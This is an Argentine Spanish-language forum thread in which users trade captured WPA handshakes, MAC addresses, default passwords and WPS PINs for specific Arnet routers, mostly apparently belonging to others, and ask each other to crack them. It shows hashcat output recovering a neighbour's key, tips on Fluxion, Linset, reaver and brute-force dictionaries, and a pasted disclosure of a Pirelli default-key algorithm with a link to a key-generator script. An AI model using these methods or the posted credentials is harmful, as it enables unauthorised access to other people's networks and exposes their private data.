(https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-xtp1/v/t1.0-9/12928286_10207258221268815_7171889695606160347_n.jpg?oh=eea22490b58a4be5a4c5f069eb1b87f8&oe=57B6DACC&__gda__=1471765769_5ed225e74190113e807606d44b250967) (https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-xtp1/v/t1.0-9/12928286_10207258221268815_7171889695606160347_n.jpg?oh=eea22490b58a4be5a4c5f069eb1b87f8&oe=57B6DACC&__gda__=1471765769_5ed225e74190113e807606d44b250967)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 07 de Abril de 2016, 08:53:41 pm
I figured out ....
Estamos hasta el pingo entonces sin algún script que pueda descrifrar el maldito pin de esos modems.:/
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: totial en 08 de Abril de 2016, 11:15:44 am
Alguno que tenga uno de estos routers nuevos podra leer el firmware para luego analizar la generacion de la clave por defecto? Algunos routers lo hacen al arrancar. De ahi se puede sacar la semilla de generacion que probablemente junto con la mac generan la clave wpa.
saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: JameZ en 21 de Abril de 2016, 03:25:53 pm
Buenas gente. Tengo una pequeña duda con una señal que vengo captando hace unos días atrás.

Me llamó la atención el como termina, es una señal por default.. así que supongo que tendrá una contraseña por default también.

Datos:

Wifi-Arnet-635s
54:dc:96:35:01:b8
WPA2

Datos sacados con Wifi-Analyser para Android.

Como dije arriba, me llamó la atención la letra S al final. Alguno ha trabajado con éste tipo?

Use wifislax con Goyscript WPS, pero nada. Y Gemini Auditor marca una x en color rojo sobre esta misma señal.
Así que supongo que debo usar un diccionario, pero cual será el recomendable?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 26 de Abril de 2016, 02:23:45 pm
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.
De cuántos digitos estaríamos hablando?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 26 de Abril de 2016, 03:13:55 pm
De cuántos digitos estaríamos hablando?

8 si es igual el WPS a la WPA
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 29 de Abril de 2016, 06:26:22 pm
@D3M0N no tenés más ese TG588 en tu poder?
Que bobina, como no te pedí un dumpeo del firmware. Lo compartíamos por donde sea, con tal que alguien pueda sacar el maldito algoritmo para reventar el pin.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 29 de Abril de 2016, 06:42:32 pm
@D3M0N no tenés más ese TG588 en tu poder?

No
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Anubix en 29 de Junio de 2016, 06:08:15 am
Sumo mi granito de arena. Conseguido con Fluxion

54:DC:96:35:01:B8

WPA

WiFi-Arnet-635s

Contraseña: e3hv78zu7r
Pin: 56004649
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: bolo en 12 de Septiembre de 2016, 12:08:57 am
Hola,

Por alli alguna alma caritativa, que me pueda ayudar con este router,
si tienen algun diccionario que me puedan sugerir para este AP

WiFi-Arnet-B73n
B4-B3-62-6C-C4-C5

aca les pongo la captura que hize con handshake, WPS desactivado.
coloco la clave que genera pirelli pero naca la pirinaca,

http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap (http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap)


Les agradezco de antemano.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Yoshitoshi en 16 de Septiembre de 2016, 04:09:15 pm
Hola que tal, soy de Córdoba (Argentina) y felicito al que creó este sitio.

Capturé este handshake de Arnet. Me podrían dar una mano?

Link:
https://drive.google.com/file/d/0B7k5vsoxDnfoV2JUcHppUDBRNVk/view?usp=sharing
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: michi en 23 de Septiembre de 2016, 08:02:39 pm
Hola!

A mis viejos hace poco les cambiaron el modem Arnet. Les dejo los datos:

Fabricante
Technicolor
Nombre del Producto
MediaAccess TG582n v2
Versión Software
15.38.1619
Versión Firmware
15.38.1619-0709005-20150921124152
Versión Hardware
VANT-U
Número de Serie
CP1547SAC6N
Dirección MAC
C4:EA:1D:B1:56:7C

SSID: WiFi-Arnet-B1567D
Seguridad: WPA2 PSK
Contraseña: 2B074A882F
PIN: 58909065

Si necesitan el firmware díganme cómo lo obtengo y lo comparto.
Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 05 de Octubre de 2016, 10:52:31 am
Hola,

Por alli alguna alma caritativa, que me pueda ayudar con este router,
si tienen algun diccionario que me puedan sugerir para este AP

WiFi-Arnet-B73n
B4-B3-62-6C-C4-C5

aca les pongo la captura que hize con handshake, WPS desactivado.
coloco la clave que genera pirelli pero naca la pirinaca,

http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap (http://www.mediafire.com/download/nb7hsba6rco0hb9/WiFi-Arnet-B73n_%28B4-B3-62-6C-C4-C5%29.cap)


Les agradezco de antemano.

Hola, no se como llegué hasta acá pero ya aburrido decidi probar tu cap con un pequeño  diccionario  que tengo que lo hace en 5 minutos y oh sorpresa! saltó la clave!
ojala tuviera yo esa suerte!
Abrazo!

WiFi-Arnet-B73n:b4b3626cc4c5:ec1f727247bd:tibiletti

Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: File (d:\www\dic\lista.txt)
Hash.Target....: WiFi-Arnet-B73n (b4:b3:62:6c:c4:c5 <-> ec:1f:72:72:47:bd)
Hash.Type......: WPA/WPA2
Time.Started...: Wed Oct 05 10:46:37 2016 (3 mins, 14 secs)
Speed.Dev.#1...:    60537 H/s (12.14ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 13953921/15016242 (92.93%)
Rejected.......: 2162561/13953921 (15.50%)
Restore.Point..: 13875369/15016242 (92.40%)

Started: Wed Oct 04 10:46:37 2016
Stopped: Wed Oct 04 10:49:58 2016


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diego10 en 05 de Octubre de 2016, 11:06:23 am
tibiletti en un diccionario?

mas que tibiletti yo diria tibilete
mas que letti puaj que ojete  8)

salio con rima nomas! se va la segunda....

http://www.youtube.com/watch?v=L7-qw32cDt0
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: bolo en 07 de Octubre de 2016, 03:25:25 pm
Hola, no se como llegué hasta acá pero ya aburrido decidi probar tu cap con un pequeño  diccionario  que tengo que lo hace en 5 minutos y oh sorpresa! saltó la clave!
ojala tuviera yo esa suerte!
Abrazo!

WiFi-Arnet-B73n:b4b3626cc4c5:ec1f727247bd:tibiletti

Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: File (d:\www\dic\lista.txt)
Hash.Target....: WiFi-Arnet-B73n (b4:b3:62:6c:c4:c5 <-> ec:1f:72:72:47:bd)
Hash.Type......: WPA/WPA2
Time.Started...: Wed Oct 05 10:46:37 2016 (3 mins, 14 secs)
Speed.Dev.#1...:    60537 H/s (12.14ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 13953921/15016242 (92.93%)
Rejected.......: 2162561/13953921 (15.50%)
Restore.Point..: 13875369/15016242 (92.40%)

Started: Wed Oct 04 10:46:37 2016
Stopped: Wed Oct 04 10:49:58 2016


WOW! Solo te tomo 3 minutos!  Desde ya muchas gracias, tibiletti es la nombre de la calle en donde se ubica el user de la antenita en mención, me hiciste el día brother, te ganaste un pedacito de cielo, jeje.. 
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elhereje en 22 de Noviembre de 2016, 01:13:17 pm
Hola, si a alguien le pinta probar este cap de arnet se los agradecería, tengo buena señal sería un golazo para mi, es el modem nuevo. Gracias.

https://mega.nz/#!FJ5GzLiI!PXQZ5zQAeMytRbLUjkftJFXlnguYx3IkMBhTD-SONnE (https://mega.nz/#!FJ5GzLiI!PXQZ5zQAeMytRbLUjkftJFXlnguYx3IkMBhTD-SONnE)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: slescano en 10 de Diciembre de 2016, 04:42:01 pm
que lo pario tengo el mismo caso de los equipos nuevos de Arnet MediaAccess TG 588v SSID= "WIFI-ARNET-C384E9" MAC=C4:EA:1D:C3:84:E9 que como podemos ver conincide el SSID la parte final con la MAC del equipo. si bien tengo el handshake aun no he podido romperlo, tmb probe de muchas otras maneras sin exito, a alguien se le ocurre que diccionario pueda buscar o como puedo armar uno? la vdd que nose como armar uno y quiero colaborar. Abz
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 14 de Diciembre de 2016, 09:11:12 pm
Espero que sirva mi pequeño aporte.

Modem: zxhn h168n
Software versión: ZXHN H168N V1.1.00_TA_11
Hardware Versión: 963168vx-Broadcom
Nombre de la red: WiFi-Arnet-wz67
MAC: DC:02:8E:C6:87:DD
Pass: 4938271655

Modem: p-660hnu-t1 v2
software versión: 2.00(AAiJ
Nombre de la red: WiFi-Arnet-w59k
MAC: A0:E4:CB:4F:8A:84
Pass: RYKAJP37MCYEJ

alguien me ayuda con una mac: 44:E9:DD de Arnet?


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 28 de Diciembre de 2016, 05:43:40 pm
que lo pario tengo el mismo caso de los equipos nuevos de Arnet MediaAccess TG 588v SSID= "WIFI-ARNET-C384E9" MAC=C4:EA:1D:C3:84:E9 que como podemos ver conincide el SSID la parte final con la MAC del equipo. si bien tengo el handshake aun no he podido romperlo, tmb probe de muchas otras maneras sin exito, a alguien se le ocurre que diccionario pueda buscar o como puedo armar uno? la vdd que nose como armar uno y quiero colaborar. Abz
Yo me di por vencido con éstos modems porque no hay ningún script que vulnere la protección del PIN que trae por default.
Si te animás hacete un diccionario usando nros del 0 al 9 y letras mayúsculas de la A a la F en 10 caracteres. Va a pesar una tonelada, pero la clave por default seguro está ahí.  :P
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: puckJ en 02 de Enero de 2017, 04:57:52 pm
Aporte
Wifi-Arnet-4vbm
dz8he47x37
wps: 74320028
D4:63:FE:E6:AF:34
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 08 de Enero de 2017, 07:27:16 pm
Disculpen que los moleste, alguien podría ayudarme con una clave?
intenté de todo... fluxion (no resultó), su antecesor linset, reaver pero me bloquea cada 3 pines más de 15 minutos y a veces mucho mucho más... wpspin generator, y ya me quedé sin ideas... sólo me quedaría pasar diccionarios pero pasa que mi pc es MUY absolutamente MUY pobre de hardware. algún alma caritativa :P pasaría este handshake por su diccionario?

https://mega.nz/#!XcskiJiS!FxtgIuMXCqaPwIi7c5-vSfXVM9JPSqtxHvsYrtopBbg

Gracias de antemano. Abrazo
essid: WiFi-Arnet-2C44
bssid: A4:5D:A1:6D:2C:45
WPA2 CCMP PSK
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 10 de Enero de 2017, 07:50:05 pm
Disculpen que los moleste, alguien podría ayudarme con una clave?
intenté de todo... fluxion (no resultó), su antecesor linset, reaver pero me bloquea cada 3 pines más de 15 minutos y a veces mucho mucho más... wpspin generator, y ya me quedé sin ideas... sólo me quedaría pasar diccionarios pero pasa que mi pc es MUY absolutamente MUY pobre de hardware. algún alma caritativa :P pasaría este handshake por su diccionario?

https://mega.nz/#!XcskiJiS!FxtgIuMXCqaPwIi7c5-vSfXVM9JPSqtxHvsYrtopBbg

Gracias de antemano. Abrazo
essid: WiFi-Arnet-2C44
bssid: A4:5D:A1:6D:2C:45
WPA2 CCMP PSK

Hola,
 
le pasé de 8 dígitos y unos diccionario de palabras y nada che :(





Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 10 de Enero de 2017, 09:11:48 pm
bueno por lo menos sé que no es nada fácil... seguiré rompiendome la cabeza y buscando muchos pines para no tener que hacer fuerza bruta de 1 pin por hora,
MUCHAS GRACIAS POR INTENTAR MAESTRO!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Blankitolv en 11 de Enero de 2017, 04:24:30 am
Hola,
 
le pasé de 8 dígitos y unos diccionario de palabras y nada che :(
Igual millones de gracias maestro
Título: Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: Gerardooo903ops en 26 de Enero de 2017, 04:09:14 am
 Hola, gente. Antes que nada quiero presentarme: Soy nuevo en el foro, como así también en esto de las auditorías wireless.

Hace unos meses, aquí en Argentina, la compañía de internet Arnet ha lanzado un lote de routers wifi que cuentan con un nuevo sistema de contraseñas por defecto (en los anteriores Pirelli la contraseña era simplemente ARNET), y están securizados con WPA-PSK, tipo de radio n.

El SSID se compone de WiFi-Arnet-XXXX
(No estoy seguro de que XXXX sea de longitud fija, pero XXXX es de tipo alfanumérico, y aparentemente las letras son mayúsculas)

La contraseña es de 10 caracteres alfanumericos que combinan mayúsculas, minúsculas y números.

El modelo es ZXHN H108N Fabricado por ZTE Corporation.

¿Alguien tiene una idea más extendida acerca de este patrón?

 
 En línea
willyz9
 **
Desconectado Desconectado

Mensajes: 1


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #1 : 21-10-2013, 05:05 (Lunes) »   
Hola amigo, yo estoy en misma situación que vos....
 En línea
pantersxx3
 **
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #2 : 06-12-2014, 06:31 (S?bado) »   
 Cool Estoy en la tarea, les cuento... me baje un supuesto firmware del router, lo decompile en linux, me fui a la carpeta webs y alli analilze el codigo fuente del archivo wlsecurity.html y dentro de el hay este fragmento de codgio interensate
Citar
Código:
<!-- hide
var syncNvram = '<%ejGetWl(wlSyncNvram)%>';
var ssidIdx = '<%ejGetWl(wlSsidIdx)%>';
var enblWireless = '<%ejGetWl(wlEnbl_wl0v0)%>';
var radiusServerIP = '<%ejGetWl(wlRadiusServerIP)%>';
var mode = '<%ejGetWl(wlAuthMode)%>';
var bit = '<%ejGetWl(wlKeyBit)%>';
var keyIdx = '<%ejGetWl(wlKeyIndex)%>';
var keys = new Array( "<%ejGetWl(wlKey1)%>", "<%ejGetWl(wlKey2)%>",
                      "<%ejGetWl(wlKey3)%>", "<%ejGetWl(wlKey4)%>" );
var wpaPskKey = '<%ejGetWl(wlWpaPsk)%>';
Buscando sobre que significaba <%ejGetWl( encontre que un codigo enbebido del mismisimo httpd entonces para corroborar esto use ida pro y desensamble el archivo httpd alli encontre el nombre de cada funcion que aparece en este html y en otros.. asi que es por alli donde empezar a buscar el algoritmo que genera las claves por defecto de los router o por lo menos esa es mi teoria... quien se quiera sumar me avisa que necesito ayuda  Grin
 En línea
pantersxx3
 **
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #3 : 10-12-2014, 01:01 (Mi?rcoles) »   
 Cheesy encontre la libreria donde estan las funciones que generan la contraseña y en nombre de red... pero para poder verlas hay que desensamblarlo por ende esta en asembler... me esta costando entender el codigo... si alguien ayuda solo queda interpretar el codigo y hacer el programa...
 En línea
hugomartin89
 **
Desconectado Desconectado

Mensajes: 1


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #4 : 03-01-2015, 05:08 (S?bado) »   
Cita de: pantersxx3 en 10-12-2014, 01:01 (Mi?rcoles)
Cheesy encontre la libreria donde estan las funciones que generan la contraseña y en nombre de red... pero para poder verlas hay que desensamblarlo por ende esta en asembler... me esta costando entender el codigo... si alguien ayuda solo queda interpretar el codigo y hacer el programa...

me interesa, y algo podría aportar...
« Última modificación: 03-01-2015, 05:08 (S?bado) por hugomartin89 »    En línea
pantersxx3
 **
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #5 : 07-01-2015, 19:30 (Mi?rcoles) »   
 Grin disculpa mi demora, ya me echado al abandono, todo esta en una libreria, algo ananlice pero mi assembler es malo, agregame al face www.facebook.com/horacio.fanelli y lo vemos mejor u quien quiera seguir este camino... Angry
 En línea
geminis_demon
Colaborador
*
Desconectado Desconectado

Mensajes: 2378


Prácticas precisas precisan práctica


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #6 : 07-01-2015, 21:46 (Mi?rcoles) »   
Ibais por buen camino, el algoritmo estaba en una librería, pero ya se os han adelantado  Grin

http://foro.seguridadwireless.net/desarrollo-112/cve-2015-0558-default-wpa-key-generation-algorithm-for-pirelli-routers/
 En línea


La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.
pantersxx3
 **
Desconectado Desconectado

Mensajes: 4


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #7 : 08-01-2015, 03:14 (Jueves) »   
 Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Grin Angry Angry Angry Angry Angry Angry Angry Angry Angry Angry
 En línea
Danonino2003
 **
Desconectado Desconectado

Mensajes: 1


Ver Perfil   
   
Re: Contraseñas por defecto de Wifi-Arnet-XXXX
« Respuesta #8 : 08-12-2015, 13:57 (Martes) »   
Buenos dias gente, soy nuevo en el palo la verdad q toco un poco de oido del tema y queria saber si alguien me podia orientar un poco. Estoy intentando chequear la seguridad de un par de redes y me esta resultando imposible y por lo que veo muchos se pusieron contentos por algo que a duras penas entiendo jajaja les paso mi situacion




La cuestion es que no doy pie con bola con esto y eh visto que hay un programa q trabaja con android que me permite ver el numero de pin,alguno lo conoce o me sabe dar algun consejo? Gracias

Cita de: geminis_demon
link=topic=51909.msg324485#msg324485 date=1420663583
Ibais por buen camino, el algoritmo estaba en una librería, pero ya se os han adelantado  Grin

http://foro.seguridadwireless.net/desarrollo-112/cve-2015-0558-default-wpa-key-generation-algorithm-for-pirelli-routers/

y en esta parte es otra pagina del foro donde un chabon uso ingenieria inversa nose que caca es eso y hizo una app que ahora la cobre el muy forro para los routers arnet argentina 2014-2015 creo.

Un par de años si no me acuerdo mal, yo estaba haciendo ingeniería inversa en algunos routers españolas desplegadas por Pirelli también. Después extraje el firmware y descubrí una biblioteca sospechosa con muchas referencias a las funciones de generación de claves. Por desgracia, no pude recuperar el propio algoritmo. Principalmente, porque los routers no estaban usando el mismo algoritmo para la generación de claves por defecto y simplemente porque tal algoritmo no era explícitamente allí. La [El Usuario ha Insultado] sucede! Sin embargo, ya que no podía revelar el algoritmo entonces decidí probar otra manera de recuperar las claves. Con el tiempo, me di cuenta de que estos routers son vulnerables al acceso remoto no autorizado y no autenticado y cualquier adversario podría alcanzar código HTML de nuestra dirección IP pública. Un montón de HTMLs fueron capaces de ser descargados sin ningún tipo de restricción, lo que significa una enorme fuga. Siendo vulnerable a un montón de ataques malignos. Esta divulgación de información a distancia se puede ver en esta CVE-2.015-0554. Por otro lado, no sé si los routers argentinos también son vulnerables a esta vulnerabilidad. No dude en probarlo y que me haga saber también.

Sólo para ver lo fácil que era conseguir esas llaves en la HomeStation (ESSIDs-como WLAN_XXXX) en España, un simple comando curl fue suficiente:

Hoy estoy va a explicar cómo me ingeniería inversa de una biblioteca MIPS con el fin de recuperar la WPA por defecto de generación de claves algoritmo para algunos routers argentinos desplegados por Pirelli. Concretamente el router afectado es el modelo P.DG-A4001N. En primer lugar, no soy ni argentino ni vivo allí. Sin embargo, accidentalmente he observado algunas pegatinas de routers de Pirelli en un foro al azar y como un usuario que ya había publicado públicamente el firmware de los routers luego decidí darle una oportunidad. Como recordaba todavía el archivo en el que se clavaron en los routers españoles, que rápidamente intentó recuperar el algoritmo en estos routers. Siguiente escritura es la forma en que he seguido hasta lograrlo.

Ingeniería inversa del algoritmo de generación de claves por defecto

En esta sección, vamos a aplicar ingeniería inversa a una biblioteca MIPS, /lib/private/libcms.core, que se encuentra en el propio firmware. En primer lugar, vamos a comentar que el firmware se extrajo de otro usuario (fernando3k) y posteriormente se extrae mediante el uso de Binwalk y el firmware-mod-kit. Una vez que se montó en nuestro sistema, nos encontramos con una función llamada GenerateKey. Como se ha visto, los símbolos no se han eliminado en los binarios y nombres de funciones externas siguen ahí porque la compilación dinámica. Esto nos ayudará mucho en nuestra tarea de ingeniería inversa. Además de eso, hemos visto cómo rápidamente esta función se llama a otra que se llama generatekey_from_mac. En este momento, decidí darle una oportunidad a este desafío. Antes de empezar, IDA Pro nos puede ayudar con las referencias cruzadas (referencias externas a partir de IDA Pro) entre las funciones. Vamos a ver cómo se llaman funciones en la biblioteca. (Zoom de imágenes para ver correctamente)
Realmente parece grande! Ahora vamos a ver las referencias cruzadas. Hemos descubierto algunos consejos:
   
Problemas

Desde que intenté hacer una revelación responsable y ni ADB Pirelli ni Arnet Argentina estaban interesados en discutir el problema, por fin he decidido hacer la divulgación completa para acelerar el proceso de fijación. Parece que la única manera con algunos vendedores, simplemente hacerlas cumplir para reemplazar los routers para evitar intrusiones. Muchas cosas pueden suceder si el router SSID con Wifi-Arnet-XXXX tiene la contraseña predeterminada. Para su información, contraseñas por defecto se encuentran en un adhesivo en la parte inferior de los routers. Si usted es propietario de una de estas redes, por favor, cambie su contraseña tan pronto como sea posible. Siempre debe cambiar las contraseñas por defecto, sin embargo.

Un adversario, dentro de la gama de wifi, podría tener acceso a la red y cometer cualquier tipo de fraude. Ser seguro y cambiar las contraseñas en estos momentos!
Línea de tiempo

11.09.2014 encontrado el algoritmo
12/09/2014 Enviar un mensaje a través de Twitter @ArnetOnline @enovella_
09/15/2014 Enviar un mensaje a través de un sitio web, todavía en busca de un simple mail
09/16/2014 Enviar otro mensaje a Arnet a través website.First respuesta a través de twitter donde me redirigen a la forma del web site.
19/09/2014 Enviar un mensaje directo a través de Twitter. Hablo con ellos acerca de la vulnerabilidad crítica y ofrecerles un correo electrónico con la clave PGP
09/20/2014 Más Twitter PM sobre el mismo. Ellos no quieren ser conscientes del problema sin embargo.
23/09/2014 supongo que Arnet no se preocupa por la seguridad de sus clientes en todo lo relativo a su poco interés.
24/09/2014 I enviar el problema al proveedor de ADB Pirelli a través del formulario web
28/09/2014 envío el problema al proveedor de ADB Pirelli través de correo electrónico a Suiza
05/01/2015 La revelación completa
de prueba de concepto

Esta corrección de pruebas de concepto y muchos algoritmos de generación de claves por defecto Pirelli pueden encontrar en mi repositorio Bitbucket. Espero que puedan usarlos. También un copiar y pegar de la primera versión se pueden mirar adelante.

Toda la información   Enojado Enojado
http://ednolo.alumnos.upv.es/?p=1883

Gracias Dudux MuecaEduardo Novella @enovella_

 
 En línea
buckynet
Colaborador
*
DesconectadoDesconectado

Mensajes: 540


Ver Perfil   
   
Re: CVE-2015-0558: default WPA algoritmo de generación de claves para los routers de Pirelli
« Respuesta # 1: 01.06.2015, 00:30 (Martes)»   
Muy guenas a tod @ s !!!

Publicada la versión nueva de la aplicación para Android con el nuevo algoritmo WPAmagickey v1.5.  azn


http://WPAmagickey.blogspot.com
http://Buckynet.blogspot.com

Un saludo.

PD: Como siempre, en Algo, habre metido la pata.
« Modificación de Última: 06/01/2015, doce y treinta y tres (Martes) por buckynet »    En línea
vk496 Desconectado Mensajes: 2102
 *******
Desconectado





Ver Perfil  WWW   
   
Re: CVE-2015-0558: default WPA algoritmo de generación de claves para los routers de Pirelli
« Respuesta # 2: 01.06.2015, doce y cuarenta (Martes)»   
Me encanta Como lo Hacen ... Ojala Llegue un ESOs Tener Conocimientos y Habilidades Algún Día

Salu2
 En línea
USUARIONUEVO
Colaborador
*
DesconectadoDesconectado

Mensajes: 13125



Ver Perfil   
   
Re: CVE-2015-0558: default WPA algoritmo de generación de claves para los routers de Pirelli
« Respuesta # 3: 01/06/2015, doce y cincuenta y dos (Martes)»   
Código:
git clone https: //dudux@bitbucket.org/dudux/adbpirelli.git


alli encontrareis el fichero en python

Código:
wifiarnet.py


Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: Gerardooo903ops en 26 de Enero de 2017, 04:14:56 am
http://foro.seguridadwireless.net/desarrollo-112/cve-2015-0558-default-wpa-key-generation-algorithm-for-pirelli-routers/
Por si alguien quiere la pag, seguro la conocen
Se podra hacer eso de ingenieria inversa para obtener las claves como hizo el tipo este o es un embole?
Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: albugme en 26 de Enero de 2017, 06:14:48 pm
Yo lo aprendí de este mismo foro (según recuerdo D3M0N publicó una versión compilada de la calculadora de claves), lo malo es que en todas las compañías los routers van cambiando y cada vez quedan menos de esa tanda vulnerable.
Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: Gerardooo903ops en 26 de Enero de 2017, 07:30:32 pm
Si igual no la pude instalar todabia a wpa magic key en windows 7 o linux vos como hiciste? Estube viendo que saco la app wpa magic key 1.7 que al parecer tiene mas codigos pero la tenes q pagar esta en amazon  :'(
Título: Re:Info sobre arnet lo que vi en otro foro, PD: Ojo este foro es mejor jajaja :p
Publicado por: albugme en 31 de Enero de 2017, 11:23:30 pm
Si igual no la pude instalar todabia a wpa magic key en windows 7 o linux vos como hiciste? Estube viendo que saco la app wpa magic key 1.7 que al parecer tiene mas codigos pero la tenes q pagar esta en amazon  :'(

Ese no lo probé, el que te digo es este - http://arg-wireless.com.ar/index.php?topic=1006.msg6813#msg6813

Para Windows, también está el "RouterKeygen" que saca los passwords por defecto que usen algoritmos conocidos, para routers de Argentina y otros países, aunque no creo que incluya los de ese programa pago.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: satanas331 en 04 de Febrero de 2017, 03:01:14 pm
Perdon¡¡¡ no supe como subir el archivo¡¡¡


LINSET 0.14 by vk496
   
SSID: WiFi-Arnet-giw9
BSSID: EC:CB:30:35:5B:5B ()
Channel: 1
Security: WPA
Time: 00:41:37
Password: VXNAXHYXEL
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Matii en 10 de Febrero de 2017, 04:51:47 pm
Hola Gente, soy nuevo y después de ver el tremendo trabajo que hacen acá, que déjenme decirles no lo hace casi ningún foro relacionado con el temas de auditoria wifi, me decidí a pedir ayuda con un handshake de arnet que yo estoy empezando a probar diccionario, pero estoy con la netbook del gobierno y hasta conseguirla no voy a parar!! por eso cualquier ayuda pasandole cualquier dic el que quiera darme una manito va a ser bien recibido todo el que quiera apoyar pasandole algun dicc no importa cual sea se lo voy a agradecer muchisimo, asi voy descartando dicc con la netbook del gob, que aunque paresca mala jajaja 198 kb/s jajaja se banco dos redes fibertel tarde 7 dias jaja imaginen mi cara cuando vi que decia key found jajaja, pero bueno es lo que hay  :'( bueno gente todo el que me quiera ayudar pasandole cualquier dicc va a ser recibido,MUCHAS MUCHAS GRACIAS  ;) .
CAP: http://www.mediafire.com/file/0c8g4vg4kkzg6l0/WiFi-Arnet-65E0D1_%28C4-EA-1D-65-E0-D1%29.cap
MAC: C4-EA-1D-65-E0-D1
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: kernel840 en 10 de Febrero de 2017, 06:53:27 pm
Perdon¡¡¡ no supe como subir el archivo¡¡¡


LINSET 0.14 by vk496
   
SSID: WiFi-Arnet-giw9
BSSID: EC:CB:30:35:5B:5B ()
Channel: 1
Security: WPA
Time: 00:41:37
Password: VXNAXHYXEL

Hola, al linset lo instalaste sobre el ubuntu o usas otra distro para la auditoria (wifislax 4.2, kali, otro), lo virtualizaste por vmware, virtualbox al linux o lo instalaste al disco? (o por ahi un usb? :-\), que adaptador wifi usas para que te funcione bien el linset, modificaste la pagina por defecto para enganchar al SSID, te pregunto esto para mejorar este ataque que segun como lo hagas da mas errores que alegrias y mi objetivo en la vida es ser feliz  :) ;D, gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: oscar_lv65 en 15 de Febrero de 2017, 03:31:21 pm
AYUDENME A SACAR LA CONTRASEÑA A ESTAS CAP PORFAVOR

SSID:HOME-163E
BSSID:C4:27:95:27:16:3E
MANUFACTURER: TECHNICOLOR USA INC.
Model Number:123456
CHAN:1
WPA/WPA2-PSK
https://www.mediafire.com/?6w4tndvfyiwjnds


SSID:Multego 11   
BSSID:A8:D3:F7:70:22:A9
MANUFACTURER: ARCADYAN
CHAN:9
WPA/WPA2-PSK
https://www.mediafire.com/?6w4tndvfyiwjnds
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: nacho4 en 20 de Febrero de 2017, 08:49:50 pm
Buenas tardes, como andan? Primero que todo soy nuevo en el foro, muy bueno de por cierto y mas que es de Argentina, asi nos entendemos mejor en la jerga. Veo que piden ayuda para descifrar claves por fuerza bruta, si me equivoco que alguien me corrija. Tengo 3 redes que comienzan con el nombre del titulo que no las puedo sacar. No tienen WPS activado (Excepto 1) y con fuerza bruta estoy seguro que quemo mi MASTER PC del año 80' mas o menos. Recopile los datos que pude, no soy un experto en la materia y viendo otros temas, creo que junte lo necesario.

Nombre: WiFi-Arnet-56yj
BSSID: 1C:74:0D:1B:3F:B0
Seguridad: WPA2
Router: MitraStar   
Modelo MitraStar Wireless Access Point RT3593 (Nro de serie: 12345678)
* Saque el PIN (17857765) con PixieScript de Wifislax, pero no me conecta.
http://www.mediafire.com/file/sehsqwjnrv5otsj/WiFi-Arnet-56yj_%281C-74-0D-1B-3F-B0%29.cap

Nombre: WiFi-Arnet-kyet
BSSID: A0:1B:29:3A:3E:8C
